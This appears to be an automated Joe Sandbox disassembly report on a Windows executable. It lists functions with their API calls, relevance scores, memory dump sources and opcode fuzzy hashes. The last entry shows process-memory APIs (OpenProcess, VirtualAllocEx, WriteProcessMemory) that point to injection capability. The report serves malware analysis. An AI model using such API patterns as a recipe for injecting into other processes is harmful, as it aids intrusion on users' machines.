Instruction Fuzzy Hash: 4D11BC11E0F14345FA16B3F1F4922BCD2814F67B0AFC70438E41E8A2EBDD5EA4408272

Function 00007FF7A520CAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 00007FF7A520CAE6
GetLastError.KERNEL32 ref: 00007FF7A520CAF2
GetProcessHeap.KERNEL32 ref: 00007FF7A520CAFF
HeapAlloc.KERNEL32 ref: 00007FF7A520CB0E
GetTokenInformation.ADVAPI32 ref: 00007FF7A520CB2D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
Instruction ID: db1de4bbc23c69092e34d58d6037b24e7cb80363c6582cf995a735131816dc5d
Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
Instruction Fuzzy Hash: 9C118876605B8186E720EF02E880159F7B4FB9AF80B964436CF8843BA8DF3CE815C740

Function 00007FF7A520CB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 00007FF7A520CB8A
GetLastError.KERNEL32 ref: 00007FF7A520CB96
GetProcessHeap.KERNEL32 ref: 00007FF7A520CBA3
HeapAlloc.KERNEL32 ref: 00007FF7A520CBB2
GetTokenInformation.ADVAPI32 ref: 00007FF7A520CBD1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
Instruction ID: 09b1fd49f7cf6adfe30f8dfc9da81ee0092d9e118d5aa62605e4aa88c3c35cc8
Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
Instruction Fuzzy Hash: 78118C76A05B81C6E710EF02E840159F7A4FB9AF80B964436CF8953BA8EF3CE815C740

Function 00007FF7A520B748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00007FF7A520B771
ProgIDFromCLSID.OLE32 ref: 00007FF7A520B790
lstrcmpiW.KERNEL32 ref: 00007FF7A520B7A2
CoTaskMemFree.OLE32 ref: 00007FF7A520B7B4
CLSIDFromString.OLE32 ref: 00007FF7A520B7C2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
Instruction ID: 3e8b007080f2ed5309ba75c2de2880c0d96f4f78cd52287a5978b833e560ebd9
Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
Instruction Fuzzy Hash: EC1130A660AA4186E750AB26EC4033AA3A4FF86FC1F994034DE4D477BCCF3DE8458710

Function 00007FF7A5212ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7A5212EEC
GetWindowTextW.USER32 ref: 00007FF7A5212F07
MessageBeep.USER32 ref: 00007FF7A5212F1C
KillTimer.USER32 ref: 00007FF7A5212F3F
EndDialog.USER32 ref: 00007FF7A5212F5F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
Instruction ID: a3131425b0de37a96178c6e81adeeec0d49efc69d4575ecabad30fb4d0f05a98
Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
Instruction Fuzzy Hash: E5118272A0A98281EB25AB25FC4437AA360FF89F45F858031E94D062ECDF7DD585C360

Function 00007FF7A521D7F8 Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32 ref: 00007FF7A521D811
QueryPerformanceFrequency.KERNEL32 ref: 00007FF7A521D820
Sleep.KERNEL32 ref: 00007FF7A521D828
QueryPerformanceCounter.KERNEL32 ref: 00007FF7A521D833
Sleep.KERNEL32 ref: 00007FF7A521D86E

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
Instruction ID: 98ee6c1e738d856cf33ecb44be41ee761b616b56c02146c623a28e0f50ec5fe6
Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
Instruction Fuzzy Hash: 1201D8B0F0AA0282EB05AB35AC9413AD361BF97F80BD60235E10F525F8DF2DE485C620

Function 00007FF7A5220008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00007FF7A52029AD,?,?,?,00007FF7A51B2AB2), ref: 00007FF7A522003C
TerminateThread.KERNEL32(?,?,?,00007FF7A52029AD,?,?,?,00007FF7A51B2AB2), ref: 00007FF7A5220047
WaitForSingleObject.KERNEL32(?,?,?,00007FF7A52029AD,?,?,?,00007FF7A51B2AB2), ref: 00007FF7A5220055
~SyncLockT.VCCORLIB ref: 00007FF7A522005E

Part of subcall function 00007FF7A521F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7A5220063,?,?,?,00007FF7A52029AD,?,?,?,00007FF7A51B2AB2), ref: 00007FF7A521F7C9

LeaveCriticalSection.KERNEL32(?,?,?,00007FF7A52029AD,?,?,?,00007FF7A51B2AB2), ref: 00007FF7A522006A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
String ID:
API String ID: 3142591903-0
Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
Instruction ID: 711cf8b61fdc4c339880109a9d8d100cd207780bfc4d4d8c1b25b10f33b7be7b
Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
Instruction Fuzzy Hash: 7B014C7AA08B4186E710AF15E84026DB360FB99F50F904031DB8D43BA9DF3DE496C750

Function 00007FF7A51A22E8 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

EndPath.GDI32 ref: 00007FF7A51A2304
StrokeAndFillPath.GDI32 ref: 00007FF7A51A231C
SelectObject.GDI32 ref: 00007FF7A51A2331
DeleteObject.GDI32 ref: 00007FF7A51A2346
StrokePath.GDI32 ref: 00007FF7A51A2366

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
Instruction ID: 737634f5eac2864f0e3709a2086052c56e6a361aa047c846f33f81b7a68f2702
Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
Instruction Fuzzy Hash: DA019EA1A0A64AC1F7567B50FD84338B721BF1BF90F9A4134E56D062F8CF7EA4848320

Function 00007FF7A51D1DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51DB80C: GetLastError.KERNEL32 ref: 00007FF7A51DB81B
Part of subcall function 00007FF7A51DB80C: SetLastError.KERNEL32 ref: 00007FF7A51DB885

ExitThread.KERNEL32 ref: 00007FF7A51D1DB8
ExitThread.KERNEL32 ref: 00007FF7A51D1DCD

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
Instruction ID: b81460c921bc03ef3318058f2d871e11b3a63932b8f8eb315e2c87f8e73954eb
Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
Instruction Fuzzy Hash: C5012112B5BA4296EA057B30E98413CA261FF52F75FD21734C63E026F9DF3DA8548310

Function 00007FF7A52103F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 00007FF7A5210414
GetCurrentThreadId.KERNEL32 ref: 00007FF7A521041C
GetWindowThreadProcessId.USER32 ref: 00007FF7A521042C
GetCurrentThreadId.KERNEL32 ref: 00007FF7A5210434
AttachThreadInput.USER32(?,?,?,00007FF7A520E921), ref: 00007FF7A5210441

Part of subcall function 00007FF7A52107A4: SendMessageTimeoutW.USER32 ref: 00007FF7A52107CA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
String ID:
API String ID: 179993514-0
Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
Instruction ID: d77ea4f69d5c9cce117a9fd18c88d344ad5c8624373d7c497967681e550edc7e
Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
Instruction Fuzzy Hash: EBF065A0F5A61283FB1477B67C892B693517F9EF41FC65030CC0A422F9DD3EA4954620

Function 00007FF7A521B5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 00007FF7A521B5F0
GetCurrentThreadId.KERNEL32 ref: 00007FF7A521B5F8
GetWindowThreadProcessId.USER32 ref: 00007FF7A521B608
GetCurrentThreadId.KERNEL32 ref: 00007FF7A521B610
AttachThreadInput.USER32 ref: 00007FF7A521B61D

Part of subcall function 00007FF7A521CF30: SendMessageTimeoutW.USER32 ref: 00007FF7A521CF56

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
String ID:
API String ID: 179993514-0
Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
Instruction ID: de2716dd7a06ccc7da66c341bea41217a8ab33f4ce40aea8ae09e032570a2310
Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
Instruction Fuzzy Hash: D4F065A4F1A64243FB5437726C4927692517FAAF41FC65030C90E422F9DE7EA4958660

Function 00007FF7A5226D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF7A5226EBC
CoCreateInstance.OLE32 ref: 00007FF7A5226EDF
CoUninitialize.OLE32 ref: 00007FF7A52271B2

Strings

.lnk, xrefs: 00007FF7A5226D42, 00007FF7A5226DBD, 00007FF7A5226E68

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
Instruction ID: 7acabdc0df35799a98efdbbd74806376bc60bd5c6c5f0ab8f13a5f1ff36523a2
Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
Instruction Fuzzy Hash: 3CD1C362B19A4681EB01EB15E8906BDAB60FB82F84F825031EE4E47BBDDF3CD104C750

Function 00007FF7A5225F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A56D4: GetFullPathNameW.KERNEL32(?,00007FF7A51A56C1,?,00007FF7A51A7A0C,?,?,?,00007FF7A51A109E), ref: 00007FF7A51A56FF

CoInitialize.OLE32 ref: 00007FF7A52260A2
CoCreateInstance.OLE32 ref: 00007FF7A52260C5
CoUninitialize.OLE32 ref: 00007FF7A52260E3

Strings

.lnk, xrefs: 00007FF7A5225F94, 00007FF7A5225FE3, 00007FF7A5226090

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize
String ID: .lnk
API String ID: 3769357847-24824748
Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
Instruction ID: 03c0ee1627632d9cef1e77819c7f12d620a65fb5410f7e188330adfc59e67bfa
Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
Instruction Fuzzy Hash: E1D16E77B06A4685EB01EF66D4802BC77A0FB59F88B864032DE4D47BA9DF39E845C350

Function 00007FF7A51E0040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E02E4

Strings

UTF-16LEUNICODE, xrefs: 00007FF7A51E028B
ccs, xrefs: 00007FF7A51E0229
UTF-8, xrefs: 00007FF7A51E0268

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
Instruction ID: 7b86af138390463593b82538daf62680931593655f862e2e45b0c1c46c7e81ed
Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
Instruction Fuzzy Hash: A1819072D0A203C7FB677F15E940279A6E0AF13F84F868035DE0A576A8DB2DF950D621

Function 00007FF7A51CB1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51CB211
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51CB3EE

Strings

, xrefs: 00007FF7A51CB377
*, xrefs: 00007FF7A51CB322

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
Instruction ID: d60dacfcb9a49d49d7334284c8858c54df41ac16036b15f412b0f98ce9596f76
Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
Instruction Fuzzy Hash: 6261677290E24286E766AF26E0C577C77A0EB07F19FD62135C64A851ADCF2EE441C721

Function 00007FF7A51D6148 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7A51D6202

Strings

!, xrefs: 00007FF7A51D6237
acos, xrefs: 00007FF7A51D6215

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _set_statfp
String ID: !$acos
API String ID: 1156100317-2870037509
Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
Instruction ID: e8aeae2a564b0dec20050ca3828b460269e0d08ad0a9d66b0f1d8999ccaac1d1
Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
Instruction Fuzzy Hash: 6C61FA62D2AF4584E6239B34AC11376D754BFA77C0F928336E95E35AB9DF2CE0428610

Function 00007FF7A51D6408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7A51D64BA

Strings

asin, xrefs: 00007FF7A51D64CD
!, xrefs: 00007FF7A51D64EF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _set_statfp
String ID: !$asin
API String ID: 1156100317-2188059690
Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
Instruction ID: 124078800e4fc4065106367dd9ce5c20c35e273ad4babc406f08779f4e956dfc
Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
Instruction Fuzzy Hash: 3F61D962C2AF8185E613DB34AC11376D754AF977D0F928332E95E75ABDDF2CE0828610

Function 00007FF7A520EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A52196AC: WriteProcessMemory.KERNEL32 ref: 00007FF7A52196F7

SendMessageW.USER32 ref: 00007FF7A520EB35

Part of subcall function 00007FF7A5219660: ReadProcessMemory.KERNEL32 ref: 00007FF7A521969E

Part of subcall function 00007FF7A5219560: GetWindowThreadProcessId.USER32 ref: 00007FF7A52195A4
Part of subcall function 00007FF7A5219560: OpenProcess.KERNEL32(?,?,?,?,00000000,00007FF7A520E40A), ref: 00007FF7A52195B6
Part of subcall function 00007FF7A5219560: VirtualAllocEx.KERNEL32 ref: 00007FF7A52195DC

